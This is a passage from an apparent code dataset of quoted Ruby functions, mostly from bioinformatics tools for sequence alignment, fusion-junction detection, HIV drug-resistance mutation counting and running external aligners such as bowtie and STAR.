downstream.strand\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\n\t\t\t\t\telsif upstream.strand == 1 && downstream.strand == -1\n\t\t\t\t\t\tdown = dna_b[downstream.start - read_length + anchor_length..downstream.start + anchor_length - 1].upcase\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.upstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start - downstream_alignmentlength + anchor_length\t\n\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\tup = dna_a[upstream.start..upstream.start + read_length - 1].upcase\t\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.downstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start + upstream_alignmentlength - 1\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\t\t\t\t\tend\n\n\t\t\t\t\ttotal_alignmentlength = upstream_alignmentlength + downstream_alignmentlength\n\n\t\t\t\t\tif total_alignmentlength >= read_length && total_alignmentlength <= max_overhang\n\t\t\t\t\t\toverhang = total_alignmentlength - read_length\n\t\n\t\t\t\t\t\tqname = qname.to_sym\n\t\t\t\t\t\tsummary = [chr_a, upstream_breakpoint, upstream.strand, chr_b, downstream_breakpoint, downstream.strand, total_alignmentlength, mate] \n\t\t\t\t\t\t# Candidates for which both, R1 and R2, are present are deleted\n\t\t\t\t\t\t# One read can neither fall on two different non-canonical nor the same junction\n\t\t\t\t\t\tif !output_hash.has_key?(qname)\n\t\t\t\t\t\t\toutput_hash[qname] = summary\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\toutput_hash.delete(qname)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput_hash.each do |qname, v| \n\t\t\t\toutput.puts [\"#{qname.to_s}/#{v[-1]}\", v[0..-2]].join(\"\\t\") if (v[2] - v[1]).abs >= read_length\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Seed extension succeded.\"\n\tend",
"def scan_gene_blo_seqs\n GeneBloSeq.destroy_all\n\n genes = Gene.find(:all)\n\n genes.each { |gn|\n\n #assemble gene file location\n gene_blo_runs_f = \"#{AppConfig.gene_blo_runs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_f = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_p = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.phy\"\n\n \n gene_blo_runs_oa = @ud.fastafile_to_original_alignment(gene_blo_runs_f)\n gene_blo_seqs_oa = Bio::Alignment::OriginalAlignment.new\n\n\n\n puts \"gn.seqs_orig_nb:#{gn.seqs_orig_nb} oa_size: #{gene_blo_runs_oa.size}\"\n\n #schould be equal\n #should insert assertion here or make an rspec to detect source\n #puts oa.keys\n\n gene_blo_runs_oa.each_pair { |key, seq|\n puts key, seq\n gbs = GeneBloSeq.new\n #find corresponding gi\n ns = NcbiSeq.find_by_vers_access(key)\n #link to objects gene and gi\n gbs.gene = gn\n gbs.ncbi_seq = ns\n gbs.save\n gene_blo_seqs_oa.add_seq(seq,ns.id)\n\n }\n \n #save fasta file \n @ud.string_to_file(gene_blo_seqs_oa.output(:fasta),gene_blo_seqs_f)\n #save phylip file\n @ud.string_to_file(gene_blo_seqs_oa.output(:phylip),gene_blo_seqs_p)\n\n\n\n\n }\n\n end",
"def align_local(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = 0\n end\n for j in 0..y\n tab[0][j] = 0\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert, 0].max\n end\n end\n\n @table = tab\n value = 0\n @lok_max_coordinates = [0,0]\n for i in 1..x\n for j in 1..y\n if tab[i][j] >= value\n value = tab[i][j]\n @lok_max_coordinates = [i, j]\n end\n end\n end\n EvaluatedProtein.new(protein, value)\n end",
"def clustal_consensus_multi(seq_hash,open = 15, ext = 6.66, gap_treatment = 1)\n gapopen = open\n gapext = ext\n temp_dir = File.dirname($0)\n temp_file_in = temp_dir + \"/temp_sequence\"\n f = File.open(temp_file_in,'w')\n f.puts seq_hash.flatten\n f.close\n\n temp_file_out = temp_dir + \"/temp_out\"\n temp_screen_out = temp_dir + \"/temp_screen\"\n print `/applications/clustalw2 -infile=#{temp_file_in} -case=upper -outorder=input -output=gde -outfile=#{temp_file_out} >#{temp_screen_out} -gapopen=#{gapopen} -gapext=#{gapext}`\n h = {}\n File.open(temp_file_out,\"r\") do |file|\n n = 0\n file.readlines.each do |line|\n if line =~ /^\\#/\n n += 1\n h[n] = \"\"\n else\n h[n] += line.chomp\n end\n end\n end\n length = h[1].size\n consensus_bases = []\n (0..(length-1)).each do |n|\n bases = []\n h.values.each do |seq|\n bases << seq[n]\n end\n if gap_treatment == 1\n consensus_bases << creat_consensus_base_non_gap(bases)\n else\n consensus_bases << creat_consensus_base_gap(bases)\n end\n end\n File.unlink temp_file_in\n File.unlink temp_file_out\n File.unlink temp_screen_out\n Dir.chdir(temp_dir) do\n Dir.glob(\"*.dnd\") do |dnd|\n File.unlink(dnd)\n end\n end\n consensus_seq = consensus_bases.join('')\nend",
"def sdrm_pr_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"PR\"\n rf_label = 0\n start_codon_number = 1\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = hiv_protease(aa_seq)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def check_duplication (n=10)\n\n # get the first n hits\n less_hits = @hits[0..[n-1,@hits.length].min]\n averages = []\n\n less_hits.each do |hit|\n # indexing in blast starts from 1\n start_match_interval = hit.hsp_list.each.map{|x| x.hit_from}.min - 1\n end_match_interval = hit.hsp_list.map{|x| x.hit_to}.max - 1\n \n #puts \"#{hit.xml_length} #{start_match_interval} #{end_match_interval}\" \n\n coverage = Array.new(hit.xml_length,0)\n hit.hsp_list.each do |hsp|\n aux = []\n # for each hsp\n # iterate through the alignment and count the matching residues\n [*(0 .. hsp.align_len-1)].each do |i|\n residue_hit = hsp.hit_alignment[i]\n residue_query = hsp.query_alignment[i]\n if residue_hit != ' ' and residue_hit != '+' and residue_hit != '-'\n if residue_hit == residue_query \n idx = i + (hsp.hit_from-1) - hsp.hit_alignment[0..i].scan(/-/).length \n aux.push(idx)\n #puts \"#{idx} #{i} #{hsp.hit_alignment[0..i].scan(/-/).length}\"\n # indexing in blast starts from 1\n coverage[idx] += 1\n end\n end\n end\n end\n overlap = coverage.reject{|x| x==0}\n averages.push(overlap.inject(:+)/(overlap.length + 0.0))\n end\n \n # if all hsps match only one time\n if averages.reject{|x| x==1} == []\n return [\"NO\",1]\n end\n\n R.eval(\"library(preprocessCore)\")\n\n #make the wilcox-test and get the p-value\n R.eval(\"coverageDistrib = c#{averages.to_s.gsub('[','(').gsub(']',')')}\")\n R. eval(\"pval = wilcox.test(coverageDistrib - 1)$p.value\")\n pval = R.pull \"pval\"\n\n if pval < 0.01\n status = \"YES\"\n else\n status = \"NO\"\n end\n return [status, pval]\n end",
"def getAlignAndErrorPercent()\n alignmentResultFile = \"BAMAnalysisInfo.xml\"\n\n if !File::exist?(alignmentResultFile)\n raise \"Error: Did not find \" + alignmentResultFile\n end\n\n xmlDoc = Hpricot::XML(open(alignmentResultFile))\n\n xmlDoc.search(\"AnalysisMetrics/AlignmentResults\").each do |alnRes|\n readType = alnRes['ReadType']\n\n if readType.eql?(\"READ\" + @readType)\n readInfoElem = alnRes.search(\"ReadInfo\")\n\n if readInfoElem != nil\n @percentAligned = readInfoElem[0]['PercentMapped']\n @percentError = readInfoElem[0]['PercentMismatch']\n end\n end\n end\n end",
"def run_aggregation\n GRADES.each_with_index do |grade, idx|\n classifier[grade].each_pair do |metric, values|\n all_values = values\n all_values += classifier[GRADES[idx + 1]][metric] if (idx + 1) < GRADES.count\n\n classifier[grade][metric] =\n if all_values.count <= 2\n values.max || 0\n else\n (all_values.sum / all_values.count).round(2)\n end\n end\n end\n end",
"def compute(name, ref, span, snps)\n return if span.length < 1\n\n span.sort! {|a,b| a[0] <=> b[0]}\n head = span.shift\n ss,ee = head[0],head[1]\n array = []\n \n array << ss \n span.each do |breaks|\n array << breaks[0]\n array << breaks[1]\n end\n array << ee \n\n while array.size > 0\n s = array.shift\n e = array.shift\n# $stderr.puts \"#{ref}\\t#{s}\\t#{e}\"\n (s..e).each do |i|\n @coverage[ref][i] += 1 #Compute coverage on base i\n end\n end\n\n snps.each_key do |pos|\n refbase = @seq[ref][pos-1,1].upcase\n curbase = snps[pos][:snpbase]\n if snps.key?(pos + 1) or snps.key?(pos + 2) or snps.key?(pos - 1) or snps.key?(pos - 2)\n if snps.key?(pos + 1) and refbase == snps[pos+1][:snpbase] and curbase == @seq[ref][pos,1].upcase\n snps[pos][:info] << \"swap;\"\n elsif snps.key?(pos - 1) and refbase == snps[pos-1][:snpbase] and curbase == @seq[ref][pos-2,1].upcase \n snps[pos][:info] << \"swap;\"\n elsif snps.key?(pos + 2) and refbase == snps[pos+2][:snpbase] and curbase == @seq[ref][pos+1,1].upcase\n snps[pos][:info] << \"swap;\"\n elsif snps.key?(pos - 2) and refbase == snps[pos-2][:snpbase] and curbase == @seq[ref][pos-3,1].upcase\n snps[pos][:info] << \"swap;\"\n elsif snps.key?(pos + 1) or snps.key?(pos - 1) \n snps[pos][:info] << \"mnp;\"\n else\n snps[pos][:info] << \"snp;\" \n end\n else\n snps[pos][:info] << \"snp;\" \n end\n @snp[ref][pos] = '' unless @snp[ref].key?(pos)\n @snp[ref][pos] << snps[pos][:info]\n end\nend",
"def align\n [:owner, :group, :size].each do |field|\n current = @alignment[field]\n @buffer.each do |line|\n new = line[field].length\n current = new if current < new\n end\n @alignment[field] = current\n end\n end",
"def find_alignment (alignment)\r\n total = 0\r\n weighted_alignment = alignment.each do |alignment|\r\n alignment.weight = alignment.weight + total\r\n total = alignment.weight\r\n alignment\r\n end\r\n percentage = rand(1..total)\r\n weighted_alignment.each do |alignment|\r\n return alignment.name if percentage <= alignment.weight\r\n end\r\nend",
"def align\n @genome = Genome.find(params[:id])\n @proteins = Protein.all\n @method = params[:method]\n\n if params[:method] == 'local'\n @message = 'Local alignment'\n align_all_local\n elsif params[:method] == 'global'\n @message = 'Global alignment'\n align_all_global\n end\n\n end",
"def align_all_global\n @results = []\n @proteins.each { |protein|\n @results << align_global(protein)\n }\n @results = @results.sort_by { |evaluated_protein| evaluated_protein.value }\n end",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def calculate_fitness\n return 'done' if @dna == @target_dna\n fit_arr = []\n @target_dna.each_with_index do |e, i|\n fit_arr.push((@dna[i] - e).abs)\n end\n (1 / fit_arr.inject(:+).to_f) * 100\n end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped reads into fastq-format.\"\t\n\tend",
"def before_results(controller_params)\n @num_seqs = 0\n @header = []\n @aln_blocks = []\n \n resfile = File.join(job_dir, jobid+\".out\")\n raise(\"ERROR with resultfile!\") if !File.readable?(resfile) || !File.exists?(resfile) || File.zero?(resfile)\n res = IO.readlines(resfile).map {|line| line.chomp}\n \n sequencefile = File.join(job_dir, jobid+\".fasta\")\n seqs = IO.readlines(sequencefile).map {|line| line.chomp}\n \n hits = []\n res.each do |line|\n \thits << line.split(/ /)[0]\n end\n logger.debug \"Hits: #{hits.inspect}\"\n\n seqfile = File.join(job_dir, jobid+\".seq\")\n \n # write one sequencs of each cluster in seqfile\n check = false\n File.open(seqfile, 'w') do |file|\n seqs.each do |line|\n if (line =~ /^>(.*)$/)\n header = ($1.split(/ /))[0]\n check = false\n if (hits.include?(header) || (header =~ /gi\\|(\\d+)\\|/ && hits.include?($1)))\n file.write(line + \"\\n\")\n check = true\n end\n else\n if check\n file.write(line + \"\\n\")\n end\n end\n end\n end\n\n\n # read in sequences for output\n res = IO.readlines(seqfile).map {|line| line.chomp}\n\n seq = \"\"\n res.each do |line|\n if (line =~ /^>/)\n if (!seq.empty?) then @aln_blocks.push(seq) end\n @header.push(line)\n @num_seqs += 1\n seq = \"\"\n else\n seq += line + \"\\n\"\n end\n end\n if (!seq.empty?) then @aln_blocks.push(seq) end\n \n # write sequences in lines with 80 characters\n @aln_blocks.map! do |seq|\n \ti = 0\n \tnew_seq = \"\"\n \twhile (i+80 < seq.length)\n \t\tnew_seq += seq.slice(i...i+80) + \"\\n\"\n \t\ti += 80\n \tend\n \tnew_seq += seq.slice(i...i+80) + \"\\n\"\n end\n end",
"def calc_global_stats()\n\n #common set of genes\n \n core_genes_ids = [110,111,112,113,114,115,119,123,136,137,138,139,140,141,149,154,156,157,159,164,168,181,182,183,184,186,193,195,196,199,202,204,206,216]\n \n self.genes_core = Gene.find(:all, :conditions => { :id => core_genes_ids })\n self.genes_all = Gene.find(:all)\n #puts \"genes: #{genes.inspect}\"\n\n self.taxons_cnt = NcbiSeqsTaxon.count(:distinct => true)\n puts \"taxons_cnt: #{taxons_cnt}\"\n\n\n #img_tot_cnt\n self.itc_hsh = ProkGroup.find(:all) \\\n .each_with_object({ }){ |c, hsh| hsh[c.id] = c.img_tot_cnt }\n\n\n #prok group taxon number\n #all small n as constant\n #self.pgtn_hsh = Taxon.joins(:ncbi_seqs_taxon) \\\n # .joins(:taxon_group) \\\n # .group(\"prok_group_id\") \\\n # .select(\"prok_group_id, count(*) as cnt\") \\\n # .each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt }\n\n self.pgtn_hsh_core = Taxon.find_by_sql(\"select pg.ID as prok_group_id,\n nvl(t2.cnt,0) as cnt\nfrom PROK_GROUPS pg\nleft outer join \n(\nselect pg.id, count(*) as cnt\nfrom PROK_GROUPS pg\n join TAXON_GROUPS tg on tg.PROK_GROUP_ID = pg.ID\n join NCBI_SEQS_TAXONS nst on nst.TAXON_ID = tg.TAXON_ID\nwhere nst.TAXON_ID in (select distinct tx.ID\n from taxons tx\n\t\t\t\t\t join NCBI_SEQS ns on ns.TAXON_ID = tx.ID\n\t\t\t\t\t join GENE_BLO_SEQS gbs on gbs.NCBI_SEQ_ID = ns.id\n\t\t\t\t\t join taxon_groups tg on tg.TAXON_ID = tx.ID\n\t\t\t\t\t where gbs.GENE_ID in (110,111,112,113,114,115,119,123,136,137,138,139,140,141,149,154,156,157,159,164,168,181,182,183,184,186,193,195,196,199,202,204,206,216)\n)\ngroup by pg.id\n) t2 on t2. id = pg.id \n\").each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt.to_f }\n\nself.pgtn_hsh_all = Taxon.find_by_sql(\"select pg.ID as prok_group_id,\n nvl(t2.cnt,0) as cnt\nfrom PROK_GROUPS pg\nleft outer join \n(\nselect pg.id, count(*) as cnt\nfrom PROK_GROUPS pg\n join TAXON_GROUPS tg on tg.PROK_GROUP_ID = pg.ID\n join NCBI_SEQS_TAXONS nst on nst.TAXON_ID = tg.TAXON_ID\nwhere nst.TAXON_ID in (select distinct tx.ID\n from taxons tx\n\t\t\t\t\t join NCBI_SEQS ns on ns.TAXON_ID = tx.ID\n\t\t\t\t\t join GENE_BLO_SEQS gbs on gbs.NCBI_SEQ_ID = ns.id\n\t\t\t\t\t join taxon_groups tg on tg.TAXON_ID = tx.ID\n)\ngroup by pg.id\n) t2 on t2. id = pg.id \n\").each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt.to_f }\n\n \n \n \n \n #puts @pgtn_hsh.inspect\n\n #prok group sequence number\n #find nb of sequences in group\n #debug\n #Rails.logger.level = 0 # at any time\n self.pgsn_hsh_all = Taxon.joins(:ncbi_seq => :gene_blo_seq) \\\n .joins(:taxon_group) \\\n .group(\"prok_group_id\") \\\n .select(\"prok_group_id, sum(weight_pg) as cnt\") \\\n .each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt }\n \n self.pgsn_hsh_core = Taxon.joins(:ncbi_seq => :gene_blo_seq) \\\n .joins(:taxon_group) \\\n .where({ \"GENE_BLO_SEQS.gene_id\" => core_genes_ids }) \\\n .group(\"prok_group_id\") \\\n .select(\"prok_group_id, sum(weight_pg) as cnt\") \\\n .each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt.to_f }\n\n \n #puts @pgsn_hsh.inspect\n \n \n #exit(0)\n #debug\n #Rails.logger.level = 2 # at any time\n\n\n end",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def hit_strand; @genomic.strand; end",
"def exec_range_alpha\n if $run_alpha_range\n puts \"Iterating over range of alpha values. This may take a while...\"\n else\n puts \"Running nCOP with alpha = #{$alpha_range[0]}. Prioritizing genes...\"\n end\n \n aggrStats = RunInfo.new\n \n # for each alpha and beta\n $alpha_range.each do |n|\n start_alp = Time.now\n \n # scale alpha and beta appropriately\n $ALPHA = n.round(4)\n $BETA = ((1 - $ALPHA).to_f/$normalization_const).round(4)\n \n # initialize an empty array for bad starting nodes\n $bad_starting_genes = []\n\n # run it NUM_ITER times\n exec_iter_fixed_alpha aggrStats\n \n puts \" alpha = #{n} done\"\n #puts \"avg iter for $ALPHA = #{n} completed after = #{proper_time_since(start_alp)}\" if $run_alpha_range\n end\n \n # remember the stats\n $aggrStats = aggrStats\n \n puts \"Done.\"\nend",
"def sdrm_rt_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"RT\"\n rf_label = 1\n start_codon_number = 34\n gap = \"AGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCAC\"\n\n n_seq = sequences.size\n mut_nrti = {}\n mut_nnrti = {}\n mut_com = []\n r1_aa = {}\n r2_aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n r1 = seq[0,267]\n r2 = seq[267..-1]\n seq = r1 + gap + r2\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n\n r1_aa[name] = aa_seq[0,89].join(\"\")\n r2_aa[name] = aa_seq[-85..-1].join(\"\")\n nrti = sdrm_nrti(aa_seq,start_codon_number)\n nnrti = sdrm_nnrti(aa_seq,start_codon_number)\n mut_com << (nrti.merge(nnrti))\n\n nrti.each do |position,mutation|\n if mut_nrti[position]\n mut_nrti[position][1] << mutation[1]\n else\n mut_nrti[position] = [mutation[0],[]]\n mut_nrti[position][1] << mutation[1]\n end\n end\n nnrti.each do |position,mutation|\n if mut_nnrti[position]\n mut_nnrti[position][1] << mutation[1]\n else\n mut_nnrti[position] = [mutation[0],[]]\n mut_nnrti[position][1] << mutation[1]\n end\n end\n end\n\n mut_nrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n\n mut_nnrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NNRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n r1_aa_start = 34\n r2_aa_start = 152\n\n r1_aa_size = r1_aa.values[0].size - 1\n r2_aa_size = r2_aa.values[0].size - 1\n\n (0..r1_aa_size).to_a.each do |p|\n aas = []\n r1_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r1_aa_start] = count_aas.sort_by{|_k,v|v}.reverse.to_h\n r1_aa_start += 1\n end\n\n (0..r2_aa_size).to_a.each do |p|\n aas = []\n r2_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r2_aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n r2_aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def sdrm_in_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"IN\"\n rf_label = 2\n start_codon_number = 53\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = sdrm_int(aa_seq, start_codon_number)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n 